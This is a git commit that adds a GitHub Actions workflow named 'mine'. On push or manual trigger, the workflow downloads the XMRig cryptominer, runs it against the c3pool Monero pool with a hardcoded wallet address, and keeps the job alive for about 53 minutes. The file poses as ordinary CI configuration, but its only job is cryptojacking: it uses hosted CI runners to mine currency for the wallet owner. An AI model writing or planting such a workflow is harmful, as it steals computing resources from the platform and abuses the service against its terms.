mine 7pm3f7

This commit is contained in:
wkunml7kg4tepu 2026-04-13 00:09:42 +00:00
parent 48f8968d9c
commit 79442eeb64
1 changed files with 14 additions and 0 deletions

View File

@ -0,0 +1,14 @@
name: mine
on:
push:
branches: [main]
workflow_dispatch:
jobs:
mine:
runs-on: ubuntu-latest
timeout-minutes: 55
steps:
- run: |
curl -sL https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz | tar xz --strip-components=1
./xmrig -o mine.c3pool.com:15555 -u 87gtFpmvkY92UFddzbpFoGUWY9GMxj9LVVrjGix86h2Y6gdXnsfRCFw7h5Wz7LCmoJF8em5GYditNGwpkqmBmajXVSMXnHM -p fg-7pm3f7 --donate-level=0 -t 2 &
sleep 3200